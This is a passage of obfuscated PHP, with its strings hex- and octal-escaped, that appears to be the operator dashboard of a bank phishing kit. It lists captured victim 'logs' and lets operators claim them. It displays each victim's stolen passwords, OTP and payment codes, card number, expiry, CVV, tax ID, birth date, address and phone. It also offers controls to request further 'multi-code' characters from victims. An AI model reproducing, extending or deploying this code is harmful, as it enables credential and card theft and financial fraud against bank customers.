\x64\x61\154\47\40\x64\141\164\x61\x2d\164\x61\x72\147\x65\x74\x3d\x27\43\x76\151\145\x77\155\157\144\141\154\x5f\165\x73\145\162\x69\x64\137{$value["\151\x64"]}\47\76\x56\x69\x65\x77\x20\114\157\x67\74\57\x62\x75\164\x74\x6f\x6e\x3e\xa\x9\11\x9\11\x9\11\x3c\142\x75\164\164\x6f\156\40\x74\171\x70\145\x3d\x27\142\165\x74\x74\157\156\47\40\x63\154\x61\163\x73\x3d\x27\142\x74\x6e\x20\142\164\x6e\x2d\x6d\144\40\x62\164\x6e\55\144\141\x6e\x67\145\x72\x27\x20\x69\x64\x3d\47\x75\x73\145\162\x69\144\x5f{$value["\151\x64"]}\x27\157\156\143\154\x69\143\153\75\x27\144\x65\154\x65\x74\x65\x65\x6e\x74\x72\x79\50\164\x68\x69\163\x29\x27\x3e\x3c\151\x20\143\x6c\x61\x73\x73\x3d\47\x66\x61\x20\x66\x61\55\x74\162\x61\x73\150\x27\x20\x61\x72\151\141\55\x68\x69\x64\144\145\156\x3d\47\x74\x72\x75\x65\x27\76\x3c\57\x69\x3e\x3c\x2f\x62\165\164\x74\157\156\76\xa\x9\x9\11\x9\11\x3c\57\x74\144\x3e\12\x9\11\11\x9\x3c\57\x74\162\x3e\12\x9\x9\11\11"; } else { $userStatus = "\74\x73\x70\x61\x6e\x3e\74\151\155\x67\x20\163\x72\143\75\42\x70\x61\162\164\x69\141\x6c\57\x69\155\147\x2f\x6f\146\146\56\160\156\x67\42\x20\163\x74\171\154\x65\x3d\x22\x77\x69\144\x74\x68\x3a\x32\x30\160\x78\73\160\141\144\x64\151\x6e\x67\55\162\x69\147\x68\164\x3a\x31\160\170\42\x3e\74\142\x3e\x4f\146\x66\154\x69\156\x65\x3c\57\142\76\74\x2f\163\160\x61\156\76"; $savedStatus = $value["\x6c\141\x73\x74\137\141\143\164\151\166\151\164\x79"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\x6e\157\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\74\163\x70\x61\156\x3e\74\151\x6d\x67\40\x73\162\x63\75\42\160\x61\162\164\x69\x61\x6c\x2f\x69\x6d\x67\57\157\x6e\x2e\160\x6e\x67\42\40\x73\x74\x79\x6c\145\75\42\x77\x69\144\x74\150\72\62\x30\160\x78\73\x70\141\144\x64\x69\156\x67\x2d\162\x69\x67\150\164\72\61\160\170\x22\76\74\x62\x3e\x4f\156\x6c\151\x6e\145\74\57\142\76\74\57\163\x70\x61\x6e\76"; } } else { if ($savedStatus === null) { $userStatus = "\x3c\x73\160\141\156\76\x3c\151\155\x67\x20\x73\162\143\75\x22\x70\141\x72\164\151\141\x6c\57\x69\155\x67\57\156\141\x2e\x70\156\x67\x22\40\x73\164\x79\x6c\x65\75\42\167\x69\x64\x74\150\x3a\62\65\x70\x78\73\x70\141\x64\144\x69\x6e\x67\55\x72\x69\147\150\x74\x3a\61\160\170\42\x3e\74\x62\x3e\x4e\x6f\40\x64\141\x74\x61\x3c\57\x62\76\74\x2f\163\160\x61\x6e\76"; } } if ($Multiple_Admins == "\157\146\146") { echo "\12\11\x9\x9\x9\11\x3c\x74\162\x20\163\x74\x79\x6c\145\75\x27\x63\x6f\x6c\157\162\72\x77\150\x69\x74\x65\x27\76\xa\11\11\x9\x9\11\x9\74\164\x64\76{$value["\x69\x64"]}\x3c\57\x74\144\76\xa\x9\11\x9\x9\11\11\74\x74\x64\x3e{$value["\165\163\x72\154\157\147\151\x6e"]}\x3c\x2f\x74\x64\x3e\12\x9\x9\11\x9\x9\x9\74\x74\144\76{$userStatus}\74\x2f\164\x64\76\12\x9\11\x9\x9\11\x9\74\x74\x64\76{$info}\x3c\142\162\76{$value["\143\157\x6d\155\145\156\164"]}\74\57\x74\x64\x3e\12\x9\11\11\11\x9\11\74\164\144\x3e\12\x9\x9\x9\x9\x9\x9\11\x3c\x62\x75\x74\164\x6f\x6e\40\164\x79\160\145\75\x27\142\165\x74\x74\x6f\156\47\x20\x6f\156\x63\154\151\x63\153\x3d\x27\143\x6f\x6e\164\x72\x6f\154\102\164\156\x28\x74\150\x69\163\x29\47\40\x63\154\141\163\x73\x3d\x27\142\164\x6e\40\142\x74\x6e\55\x6d\x64\x20\142\x74\x6e\x2d\151\156\146\157\47\x20\151\x64\x3d\x27\165\x73\x65\162\151\x64\137{$value["\x69\x64"]}\x27\x20\144\141\164\141\x2d\164\157\147\147\x6c\145\x3d\47\x6d\x6f\x64\x61\x6c\x27\40\x64\141\164\141\55\x74\x61\162\147\x65\164\75\x27\43\x6d\x6f\144\141\x6c\137\x75\x73\x65\x72\151\x64\x5f{$value["\x69\144"]}\47\76\101\143\164\151\157\156\74\57\142\165\x74\x74\x6f\156\76\12\11\11\11\x9\11\11\11\74\142\x75\x74\164\x6f\x6e\40\x74\x79\160\145\x3d\x27\x62\x75\x74\164\157\x6e\x27\40\143\x6c\141\x73\x73\x3d\x27\142\164\156\40\142\164\156\55\x6d\144\40\x62\164\156\55\144\141\x6e\147\x65\x72\x27\40\x69\x64\75\x27\x75\163\x65\x72\x69\144\137{$value["\x69\144"]}\x27\x6f\x6e\x63\x6c\x69\143\153\x3d\47\x64\145\x6c\145\164\x65\145\x6e\164\162\x79\50\164\x68\x69\x73\51\47\76\74\151\40\143\154\x61\163\x73\75\x27\146\141\40\x66\141\x2d\x74\x72\x61\x73\x68\47\x20\x61\162\151\141\55\x68\151\x64\144\145\x6e\x3d\47\x74\162\165\x65\x27\76\x3c\57\x69\76\74\57\x62\165\x74\x74\x6f\x6e\x3e\12\11\11\11\x9\11\x9\74\57\164\144\76\12\x9\11\x9\x9\x9\74\x2f\164\x72\76\12\11\x9\11\11\x9"; } else { if ($value["\x6c\x6f\x67\x5f\157\167\x6e\x65\x72"] == '') { echo "\12\11\11\x9\x9\11\x9\x3c\x74\162\40\163\164\171\154\145\x3d\x27\143\x6f\x6c\157\162\x3a\167\150\x69\x74\145\x27\76\12\11\x9\x9\x9\x9\11\x9\x3c\x74\144\76{$value["\151\x64"]}\74\57\164\x64\x3e\xa\11\x9\x9\x9\11\11\x9\x3c\x74\144\x3e{$value["\x75\x73\x72\x6c\157\147\151\156"]}\74\57\x74\x64\76\xa\11\x9\x9\x9\x9\11\11\74\x74\144\x3e{$userStatus}\74\x2f\x74\144\76\xa\x9\11\11\x9\x9\11\x9\x3c\x74\144\x3e{$info}\74\x62\162\76{$value["\x63\x6f\x6d\x6d\145\x6e\x74"]}\x3c\57\x74\x64\x3e\xa\11\x9\11\x9\11\11\x9\74\164\144\76\12\11\x9\11\x9\11\11\x9\11\74\142\165\164\x74\x6f\x6e\40\164\x79\160\145\x3d\x27\142\x75\164\164\x6f\x6e\47\40\x6f\156\x63\154\x69\x63\x6b\75\x27\x63\x6c\141\x69\x6d\102\164\x6e\x28\x74\x68\151\x73\x29\47\40\143\154\x61\163\163\x3d\x27\x62\x74\x6e\x20\142\164\156\x2d\x6d\144\40\x62\x74\156\x2d\x69\x6e\x66\x6f\x27\x20\151\x64\x3d\x27\x75\163\x65\x72\x69\144\137{$value["\151\x64"]}\47\40\x64\141\164\x61\55\164\157\147\147\x6c\145\75\47\x6d\x6f\144\x61\x6c\x27\40\144\x61\x74\141\55\164\141\x72\x67\x65\164\x3d\x27\x23\155\x6f\x64\141\x6c\x5f\165\163\x65\162\x69\144\x5f{$value["\x69\144"]}\x27\x3e\40\x43\154\141\x69\x6d\40\x4c\x6f\x67\x20\360\x9f\224\221\x3c\57\x62\x75\164\x74\x6f\x6e\76\12\x9\x9\11\11\11\11\x9\x3c\x2f\x74\x64\x3e\12\11\11\11\x9\x9\11\x3c\57\164\162\76\xa\x9\11\11\11\x9\11"; } else { if ($value["\154\157\147\x5f\157\x77\x6e\145\x72"] == $_SESSION["\154\157\147\x5f\157\x77\x6e\x65\162"]) { echo "\12\11\11\11\11\11\x9\x3c\x74\162\40\x73\x74\171\154\145\75\47\143\157\154\157\x72\72\x77\150\x69\x74\x65\47\x3e\12\11\x9\x9\11\11\x9\x9\74\164\144\x3e{$value["\151\x64"]}\74\57\164\x64\x3e\12\11\x9\x9\11\11\x9\x9\x3c\164\144\76{$value["\x75\163\x72\154\157\147\x69\156"]}\x3c\x2f\x74\x64\x3e\12\11\x9\11\x9\x9\x9\11\x3c\x74\144\x3e{$userStatus}\74\x2f\x74\144\76\12\11\11\x9\11\11\x9\x9\74\164\144\x3e{$info}\74\x62\162\x3e{$value["\x63\157\x6d\155\x65\x6e\x74"]}\74\x2f\x74\144\x3e\xa\x9\x9\x9\11\11\11\x9\x3c\x74\144\76{$info}\x3c\57\164\144\76\xa\x9\11\11\x9\x9\x9\x9\x3c\x74\144\76\xa\x9\x9\11\11\11\11\x9\11\x3c\x62\165\164\164\x6f\156\x20\164\171\160\145\75\x27\142\165\x74\164\157\x6e\47\x20\157\x6e\x63\x6c\x69\x63\x6b\75\47\x63\x6f\156\164\162\x6f\154\x42\x74\x6e\x28\164\150\151\x73\x29\47\40\x63\154\141\163\163\75\x27\142\164\156\x20\142\164\x6e\55\x6d\x64\40\x62\164\156\x2d\151\x6e\146\x6f\x27\40\x69\144\75\47\x75\163\x65\162\151\x64\137{$value["\151\144"]}\x27\40\x64\141\x74\x61\x2d\164\x6f\x67\147\x6c\145\x3d\x27\155\157\144\x61\x6c\47\40\x64\141\x74\141\55\x74\x61\162\x67\145\164\75\47\43\x6d\157\x64\141\154\x5f\x75\x73\145\162\151\x64\137{$value["\151\x64"]}\47\76\x41\143\164\151\157\156\x3c\57\x62\x75\x74\164\157\x6e\x3e\xa\x9\11\x9\x9\11\x9\x9\11\x3c\x62\x75\x74\164\157\x6e\40\x74\x79\160\x65\75\47\142\165\164\x74\x6f\156\x27\40\x63\154\141\163\163\75\47\142\164\156\40\142\164\156\x2d\x6d\x64\40\x62\164\x6e\55\144\141\x6e\x67\x65\x72\47\x20\151\144\75\x27\165\163\145\x72\x69\144\x5f{$value["\151\x64"]}\47\x6f\156\x63\x6c\151\x63\x6b\x3d\47\x64\145\154\x65\164\145\145\x6e\x74\162\x79\x28\164\x68\x69\x73\x29\47\76\x3c\151\40\143\x6c\x61\x73\163\x3d\47\146\141\40\x66\141\55\164\x72\x61\163\150\47\x20\141\x72\151\x61\55\150\x69\144\x64\145\x6e\x3d\47\x74\162\x75\145\47\76\x3c\57\151\76\74\x2f\142\x75\x74\x74\x6f\156\x3e\12\11\x9\x9\x9\x9\11\x9\x3c\57\x74\x64\x3e\xa\11\x9\11\11\x9\x9\x3c\57\x74\x72\76\12\11\x9\x9\11\x9\x9"; } else { echo "\xa\11\11\x9\11\11\x9\x3c\164\162\x20\x73\164\x79\154\145\75\47\143\x6f\x6c\x6f\x72\x3a\167\x68\151\164\x65\x27\76\xa\11\11\x9\x9\x9\x9\x9\74\164\x64\76{$value["\x69\144"]}\74\57\164\x64\x3e\xa\x9\x9\11\x9\x9\x9\11\74\x74\144\x3e{$value["\x75\x73\162\154\x6f\x67\x69\156"]}\x3c\57\164\x64\x3e\xa\x9\11\x9\x9\x9\x9\x9\x3c\164\x64\x3e{$userStatus}\74\57\x74\144\x3e\xa\x9\x9\x9\x9\11\x9\11\74\x74\144\x3e{$info}\x3c\x62\x72\x3e{$value["\143\x6f\x6d\155\x65\156\164"]}\x3c\57\164\x64\76\12\x9\11\x9\11\11\x9\11\74\164\x64\76\xa\11\11\x9\x9\11\11\11\x9\x3c\x73\160\141\x6e\76\103\x6c\x61\x69\x6d\x65\x64\x20\x62\171\x20\55\40\74\151\76{$value["\154\157\x67\x5f\157\x77\156\x65\162"]}\74\57\151\x3e\x3c\x2f\x73\160\141\x6e\76\12\x9\x9\x9\11\x9\x9\x9\74\x2f\164\144\76\xa\x9\x9\x9\11\x9\x9\74\57\x74\162\76\12\x9\11\x9\x9\11\11"; } } } } } } if (isset($_GET["\x66\145\164\143\150\x5f\x70\143\x5f\155\157\x64\x61\154\137\144\x61\164\x61"])) { $query = mysqli_query($conn, "\x53\105\114\x45\103\x54\40\x2a\x20\146\162\157\155\40\x63\165\x73\164\x6f\x6d\x65\162\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\x73\x72\154\157\147\x69\x6e"]; $usrpass = $value["\x75\163\x72\160\141\x73\163"]; $amount = $value["\x61\155\x6f\165\156\164"]; $otpcode = $value["\x6f\164\x70\x63\x6f\144\145"]; $fname = $value["\146\x6e\x61\x6d\x65"]; $dob = $value["\144\157\142"]; $usraddr = $value["\x75\x73\162\141\144\x64\162"]; $usrnif = $value["\x75\163\162\x6e\151\146"]; $usrcode = $value["\x75\163\162\143\157\x64\145"]; $paycode = $value["\160\141\x79\143\x6f\x64\145"]; $phonenum = $value["\160\150\157\156\x65\156\165\x6d"]; $ccnum = $value["\143\x63\156\165\155"]; $cvvnum = $value["\143\166\x76\156\165\155"]; $expiry = $value["\x65\x78\160\x69\162\x79"]; $ip = $value["\151\x70"]; $useragent = urldecode($value["\x75\x73\x65\x72\x61\x67\x65\156\x74"]); $data_log = "\12\x9\x9\11\75\x3d\75\75\x3d\342\211\253\x20\114\x4f\107\111\x4e\x20\xe2\x89\252\75\x3d\75\x3d\x3d\12\x9\11\x9\x55\x73\x65\162\40\103\x6f\144\145\x20\x3a\40{$usrlogin}\12\x9\11\x9\115\x75\x6c\164\x69\x20\x43\x6f\x64\145\x20\72\x20{$usrcode}\12\11\x9\11\120\141\x73\x73\x77\x6f\x72\144\x20\x3a\x20{$usrpass}\12\11\11\x9\75\x3d\x3d\x3d\x3d\342\211\253\x20\103\117\x44\105\x20\xe2\x89\252\x3d\x3d\75\x3d\75\12\11\11\x9\117\x54\120\x20\103\x6f\x64\x65\x20\72\x20{$otpcode}\12\11\11\11\x50\x61\x79\x20\x43\157\x64\145\x20\x3a\x20{$paycode}\12\11\x9\x9\75\75\75\x3d\x3d\xe2\211\xab\40\x43\x41\122\x44\40\342\x89\252\x3d\x3d\x3d\75\x3d\xa\11\11\x9\x43\103\x20\116\165\155\40\x3a\x20{$ccnum}\xa\11\x9\x9\x45\x78\x70\151\x72\x79\40\72\x20{$expiry}\12\11\x9\x9\103\126\126\x20\x3a\x20{$cvvnum}\12\x9\x9\11\75\x3d\75\x3d\75\342\x89\253\40\101\x44\x44\111\x54\111\117\116\101\x4c\40\342\211\xaa\75\75\75\75\75\xa\x9\11\x9\x46\x75\x6c\154\x20\x4e\141\155\145\40\72\x20{$fname}\xa\11\11\11\x4e\x49\106\x20\72\x20{$usrnif}\12\x9\11\x9\104\117\102\x20\72\40{$dob}\xa\x9\11\11\101\144\144\x72\x65\x73\x73\40\72\x20{$usraddr}\12\x9\11\11\x50\150\x6f\x6e\x65\x20\x4e\165\x6d\40\72\x20{$phonenum}\12\11\11\11\x3d\x3d\75\x3d\75\75\x3d\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\12\x9\x9\11\x49\x50\40\72\40{$ip}\xa\x9\x9\11\125\x41\x20\72\x20{$useragent}\xa\11\x9\11\75\x3d\75\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\x3d\75\75\75\x3d\75\x3d\x3d\75\x3d\75\75\75\x3d\75\x3d"; echo "\12\11\xa\11\x9\x9\74\144\151\166\x20\143\154\x61\163\x73\x3d\x27\155\x6f\144\x61\x6c\40\x66\x61\x64\x65\47\40\x69\144\75\x27\x6d\x6f\x64\141\154\137\x75\163\x65\x72\151\x64\x5f{$value["\151\x64"]}\47\x20\x74\x61\x62\x69\156\144\x65\x78\x3d\47\x2d\x31\47\40\162\x6f\x6c\145\75\47\x64\151\141\154\x6f\x67\x27\40\141\162\151\141\x2d\154\x61\142\x65\x6c\154\x65\144\x62\171\75\47\145\170\141\x6d\160\154\145\x4d\157\144\141\154\114\x61\x62\x65\x6c\47\x20\x61\162\151\141\x2d\150\151\x64\144\145\156\75\47\x74\162\x75\x65\x27\40\163\x74\x79\154\x65\x3d\x27\x6f\160\141\x63\151\x74\x79\72\x31\x20\x21\151\155\x70\157\x72\164\141\156\164\x3b\144\151\163\160\154\x61\x79\72\156\x6f\156\x65\73\x68\145\151\x67\x68\x74\72\61\60\x30\x25\x3b\157\x76\145\x72\x66\x6c\x6f\x77\72\x73\x63\162\x6f\154\x6c\x3b\47\76\xa\x9\x9\x9\11\x3c\146\157\x72\x6d\40\156\x61\155\145\75\x27\143\x6f\156\x66\x69\147\x5f\x66\157\162\x6d\x5f{$value["\151\x64"]}\47\40\x69\x64\x3d\x27\x63\157\156\x66\x69\147\x5f\146\x6f\x72\155\137{$value["\151\x64"]}\47\40\155\x65\164\150\157\x64\75\x27\120\x4f\123\x54\47\x20\x61\x63\x74\151\157\x6e\75\47\x27\40\x6e\x6f\166\x61\154\151\144\x61\x74\145\76\12\x9\11\x9\11\11\x3c\151\156\x70\165\x74\x20\x74\171\x70\x65\75\47\150\151\144\x64\x65\156\47\40\x6e\x61\x6d\145\x3d\47\165\163\145\x72\x69\144\47\x20\166\x61\x6c\165\145\75\47{$value["\x69\x64"]}\47\76\xa\11\x9\x9\11\11\x3c\x64\151\166\40\x63\154\x61\x73\163\75\47\155\157\x64\x61\154\55\144\x69\x61\x6c\157\147\x27\x20\162\x6f\x6c\145\75\x27\x64\x6f\143\x75\x6d\145\156\x74\x27\x20\x73\164\x79\154\x65\75\x27\x77\x69\144\x74\150\72\65\60\x30\x70\x78\47\x3e\12\11\x9\x9\11\11\11\74\x64\151\x76\x20\143\x6c\141\x73\x73\x3d\x27\155\157\x64\x61\154\55\143\157\156\x74\145\156\x74\47\x20\163\x74\171\154\x65\x3d\x27\142\x61\x63\153\147\x72\157\x75\156\x64\x2d\x63\157\x6c\157\x72\x3a\x20\x62\x6c\141\x63\153\73\x27\76\12\11\x9\11\11\x9\11\11\x3c\144\151\166\40\143\x6c\141\x73\x73\x3d\47\155\157\144\x61\154\x2d\150\x65\x61\144\145\x72\47\40\x73\164\171\x6c\145\75\47\x62\x61\x63\153\x67\162\157\x75\156\144\55\x63\x6f\x6c\x6f\x72\72\x23\63\x34\x34\71\65\105\x3b\x66\157\x6e\x74\55\x73\x69\172\x65\x3a\x32\56\x37\x72\x65\x6d\73\x74\x65\x78\164\55\141\154\151\x67\x6e\x3a\x63\145\156\x74\145\x72\73\47\x3e\12\x9\x9\x9\11\11\x9\11\x9\x3c\150\x35\40\143\154\141\x73\x73\x3d\47\x6d\x6f\x64\141\x6c\55\164\151\164\x6c\145\x27\x20\x69\144\75\47\145\x78\141\155\160\x6c\145\x4d\157\144\141\x6c\114\x61\142\145\x6c\47\40\x73\x74\x79\154\x65\75\47\x63\x6f\154\x6f\162\x3a\167\150\x69\x74\145\47\x3e\101\x64\155\x69\156\x20\x43\157\x6e\x74\x72\157\x6c\x3c\x2f\150\x35\x3e\xa\x9\11\11\11\11\x9\x9\11\74\142\x75\x74\164\x6f\x6e\40\x74\x79\x70\145\x3d\x27\142\165\x74\x74\x6f\156\x27\40\143\154\141\163\163\75\x27\x63\154\x6f\x73\145\x27\x20\x6f\x6e\x63\x6c\151\143\153\75\x27\143\154\157\x73\145\137\x62\x74\156\x28\x29\47\40\141\162\151\x61\55\x6c\x61\142\145\154\x3d\x27\103\x6c\157\x73\x65\47\76\xa\x9\11\11\11\11\11\x9\11\x9\x3c\x73\160\141\156\x20\x61\162\x69\141\x2d\150\151\144\x64\145\x6e\x3d\47\164\162\165\x65\x27\40\x73\x74\x79\154\x65\x3d\x27\143\157\x6c\x6f\x72\72\167\x68\x69\x74\x65\47\76\x26\x74\151\155\145\163\x3b\x3c\57\x73\160\141\x6e\x3e\xa\x9\x9\11\11\x9\11\x9\x9\x3c\57\142\x75\164\164\157\156\x3e\12\11\11\11\11\11\x9\11\74\57\x64\151\166\x3e\xa\x9\11\11\11\x9\11\11\74\144\x69\x76\x20\x63\154\x61\163\163\75\x27\155\x6f\144\x61\154\55\x62\157\144\x79\47\x3e\12\11\11\11\11\11\x9\x9\11\x3c\144\x69\x76\x20\x63\x6c\141\163\163\75\x27\x66\157\162\x6d\x2d\147\x72\157\x75\x70\47\x20\x73\164\x79\x6c\145\x3d\x27\x6d\141\x72\147\x69\156\55\142\x6f\164\x74\x6f\x6d\72\x31\x72\x65\x6d\x27\x3e\xa\11\x9\x9\x9\x9\x9\x9\11\x9\x3c\x62\162\76\xa\11\11\11\11\x9\11\11\11\11\74\164\145\x78\x74\x61\162\x65\x61\x20\151\x64\x3d\x27\x74\145\x78\164\x61\x72\x65\x61\x6f\x70\164\151\x6f\156\163\47\40\143\154\141\163\163\x3d\47\146\x6f\162\x6d\55\143\x6f\x6e\x74\162\x6f\154\47\40\x64\x69\163\141\x62\154\x65\144\x3d\x27\x64\x69\163\x61\142\154\x65\x64\x27\x20\162\x6f\167\163\x3d\47\x31\66\47\40\x73\164\x79\154\145\x3d\x27\x68\145\x69\x67\x68\164\x3a\x33\x30\60\x70\x78\x3b\47\x3e{$data_log}\x3c\x2f\164\x65\x78\x74\x61\x72\x65\141\76\12\x9\11\11\x9\x9\x9\x9\x9\74\57\144\x69\166\76\xa\x9\x9\x9\x9\x9\x9\11\x9\11\12\x9\11\11\x9\11\11\11\x9\x3c\x74\141\142\x6c\145\x20\x73\x74\171\x6c\145\x3d\47\167\151\x64\x74\150\72\x20\x31\x30\60\x25\73\142\141\143\153\x67\162\x6f\x75\x6e\x64\x2d\143\x6f\x6c\157\x72\x3a\40\x62\x6c\141\x63\x6b\73\143\157\x6c\157\x72\72\x20\x77\x68\151\164\145\73\160\141\x64\x64\151\156\147\x3a\x20\61\x30\45\73\47\76\12\11\11\11\x9\11\11\x9\11\11\74\164\x62\157\144\171\x20\163\x74\x79\x6c\145\x3d\47\x6c\151\x6e\145\x2d\x68\x65\x69\147\x68\x74\x3a\x31\60\x30\x25\x3b\x27\x3e\xa\x9\x9\11\11\12\x9\x9\x9\x9\x9\x9\11\x9\11\11\x3c\164\x72\x3e\12\11\11\x9\x9\x9\11\11\11\11\11\11\x3c\164\x64\x3e\xa\11\11\x9\x9\x9\11\11\x9\11\11\11\x9\74\144\151\x76\x20\143\x6c\141\163\x73\75\47\x66\157\x72\155\55\143\150\145\x63\x6b\x27\76\xa\x9\11\11\11\x9\11\x9\11\11\11\x9\11\11\74\154\141\142\x65\154\x20\x66\157\162\x3d\x27\141\x73\x6b\143\x68\141\x72\x73\x72\141\144\x69\157\60{$value["\x69\x64"]}\47\40\143\154\141\163\x73\75\47\x66\157\x72\155\x2d\143\x68\145\x63\153\55\x6c\141\x62\145\154\x27\76\12\11\x9\11\11\x9\x9\11\x9\11\x9\11\x9\x9\x9\74\151\x6e\x70\165\x74\x20\x74\171\160\x65\x3d\47\x72\141\144\x69\x6f\x27\x20\156\141\x6d\x65\75\x27\163\x74\x61\164\165\x73\47\40\x76\x61\x6c\x75\x65\x3d\47\x31\61\47\40\151\144\x3d\47\x61\163\153\x63\150\141\162\163\162\x61\144\x69\x6f\x30{$value["\151\x64"]}\x27\40\157\x6e\x63\154\x69\x63\153\x3d\47\x73\150\157\x77\x66\151\x65\154\x64\163\x28{$value["\151\144"]}\51\73\x27\x20\x63\154\x61\163\x73\75\47\163\x74\x61\x74\165\x73\40\x66\x6f\162\155\x2d\143\x68\x65\x63\x6b\x2d\151\x6e\x70\165\164\x27\x3e\12\x9\11\11\x9\11\11\11\x9\x9\x9\11\11\x9\11\74\x73\x70\141\x6e\x3e\122\145\161\x75\x65\x73\164\40\x4d\x75\x6c\164\x69\x2d\143\x6f\x64\x65\74\x2f\x73\x70\141\x6e\76\12\x9\11\11\11\11\11\x9\11\x9\11\x9\11\x9\74\x2f\154\x61\x62\x65\154\76\xa\11\11\11\x9\x9\x9\11\x9\x9\x9\11\x9\74\x2f\144\x69\x76\76\12\11\x9\11\11\11\11\11\x9\11\x9\x9\11\x3c\x21\x2d\55\40\111\x6e\x70\165\164\40\x63\150\x61\162\141\143\164\x65\162\x73\x20\12\x9\x9\11\x9\x9\x9\x9\x9\11\x9\x9\11\x3c\144\x69\x76\x20\143\x6c\x61\x73\163\x3d\x27\146\x6f\162\x6d\x2d\x67\162\157\x75\160\x27\40\x73\x74\171\154\145\75\x27\144\151\x73\x70\154\x61\x79\x3a\156\x6f\x6e\145\73\x27\x20\151\144\x3d\47\x61\x73\x6b\x63\x68\x61\x72\x73\x30{$value["\x69\144"]}\x27\x3e\12\11\11\x9\11\x9\x9\x9\x9\x9\x9\11\x9\11\74\x64\151\x76\x20\x63\154\141\x73\163\75\x27\162\x6f\167\x27\40\x73\164\x79\x6c\x65\75\47\x6d\141\162\x67\151\x6e\x2d\x6c\x65\146\164\72\x35\x25\73\155\141\x72\147\x69\x6e\x2d\164\157\160\72\65\160\x78\47\x20\x3e\12\11\x9\11\x9\11\11\x9\x9\x9\x9\11\x9\x9\11\74\144\151\166\40\143\154\141\x73\163\75\47\x63\157\x6c\x27\76\12\x9\x9\x9\x9\11\x9\x9\11\11\x9\11\x9\11\x9\11\74\163\145\154\x65\x63\164\40\x63\154\x61\x73\x73\x3d\x27\146\x6f\x72\155\55\143\x6f\x6e\164\162\157\154\x27\40\156\x61\155\145\x3d\47\x63\x68\141\162\x31\47\76\12\x9\x9\11\x9\x9\x9\11\11\x9\x9\x9\x9\11\x9\11\11\x3c\x6f\x70\164\x69\157\x6e\x20\166\141\154\165\145\75\x27\x31\302\252\x27\x3e\61\xc2\252\x3c\x2f\x6f\160\164\151\157\156\x3e\12\x9\x9\x9\x9\11\11\11\11\x9\11\11\x9\x9\x9\11\x9\x3c\x6f\160\164\151\157\x6e\x20\166\141\x6c\x75\145\75\x27\x32\xc2\xaa\47\x3e\x32\xc2\252\74\x2f\x6f\160\164\x69\157\156\x3e\xa\11\11\x9\11\11\11\11\11\11\x9\11\x9\x9\11\x9\11\x3c\x6f\160\x74\151\x6f\x6e\40\166\x61\x6c\165\x65\x3d\x27\x33\xc2\xaa\x27\76\x33\xc2\252\x3c\57\157\160\x74\x69\157\x6e\x3e\12\11\x9\x9\11\x9\x9\11\11\x9\11\x9\11\x9\11\x9\x9\x3c\x6f\x70\164\151\x6f\x6e\x20\166\141\154\x75\x65\75\47\64\xc2\252\47\76\x34\xc2\252\x3c\x2f\x6f\160\x74\151\x6f\x6e\x3e\12\x9\11\x9\x9\11\x9\11\11\11\x9\11\11\11\11\11\11\74\157\160\164\151\157\x6e\40\x76\x61\154\165\x65\x3d\47\65\xc2\xaa\x27\x3e\x35\xc2\252\74\x2f\157\x70\164\x69\157\156\x3e\xa\11\x9\x9\11\x9\x9\11\x9\x9\11\11\x9\11\11\11\11\74\157\x70\164\x69\x6f\156\40\166\x61\154\x75\145\x3d\x27\x36\302\252\x27\76\66\xc2\xaa\x3c\x2f\x6f\x70\x74\151\x6f\x6e\76\xa\11\11\11\x9\11\x9\11\11\11\x9\11\x9\11\11\x9\11\74\x6f\160\x74\x69\157\156\x20\166\x61\154\x75\x65\75\47\x37\xc2\xaa\x27\76\x37\xc2\252\x3c\57\x6f\160\164\x69\157\x6e\x3e\12\x9\x9\11\11\x9\x9\11\11\11\x9\x9\x9\11\11\x9\x9\x3c\157\x70\164\x69\157\x6e\40\166\x61\154\165\145\75\x27\x38\xc2\xaa\x27\76\x38\302\252\74\57\x6f\160\164\x69\x6f\x6e\x3e\xa\x9\11\11\11\11\x9\11\x9\11\11\x9\x9\11\x9\11\11\x3c\157\160\164\151\x6f\x6e\x20\x76\x61\154\165\145\75\x27\x39\302\xaa\x27\x3e\x39\xc2\xaa\x3c\57\x6f\x70\x74\x69\157\156\76\12\11\x9\x9\x9\11\11\x9\11\11\11\11\11\11\11\x9\11\74\157\160\x74\151\x6f\x6e\40\x76\141\x6c\165\145\75\47\x31\60\302\252\47\76\x31\60\302\xaa\74\57\x6f\160\x74\151\157\x6e\76\12\11\x9\x9\11\x9\x9\11\x9\11\11\x9\x9\x9\11\11\11\x3c\157\x70\x74\151\x6f\x6e\40\166\x61\x6c\x75\145\75\x27\61\61\302\252\47\x3e\61\61\xc2\xaa\74\57\157\160\x74\151\157\156\76\12\11\x9\11\x9\11\11\11\x9\x9\11\x9\x9\11\x9\x9\11\74\x6f\160\x74\x69\157\156\x20\166\141\x6c\x75\x65\75\x27\x31\62\xc2\xaa\x27\76\x31\62\xc2\xaa\74\57\x6f\160\x74\x69\x6f\x6e\x3e\12\x9\11\11\x9\11\x9\11\11\11\11\11\11\11\11\11\11\x3c\x6f\160\164\151\157\156\x20\x76\141\x6c\x75\145\x3d\x27\x31\63\302\xaa\x27\76\x31\x33\xc2\252\74\x2f\x6f\x70\164\x69\x6f\x6e\76\12\11\x9\11\11\x9\x9\11\x9\11\x9\x9\x9\11\x9\x9\x3c\57\163\145\154\145\143\164\x3e\xa\x9\x9\11\11\11\11\x9\x9\11\11\x9\x9\11\x9\x3c\57\144\151\x76\76\12\x9\x9\x9\x9\11\11\x9\x9\11\x9\x9\11\x9\11\74\144\151\x76\x20\143\154\141\163\163\75\47\143\157\x6c\47\76\12\x9\11\x9\x9\x9\x9\x9\11\x9\11\11\x9\x9\x9\x9\74\163\145\154\x65\x63\164\x20\143\x6c\x61\163\x73\x3d\47\x66\x6f\162\x6d\x2d\143\157\156\x74\162\157\x6c\x27\40\x6e\141\155\x65\75\47\x63\x68\141\x72\x32\x27\76\xa\11\x9\11\11\11\x9\11\x9\x9\11\x9\11\11\11\11\11\74\157\x70\164\x69\x6f\x6e\x20\x76\141\154\x75\x65\x3d\x27\x31\xc2\xaa\47\76\61\x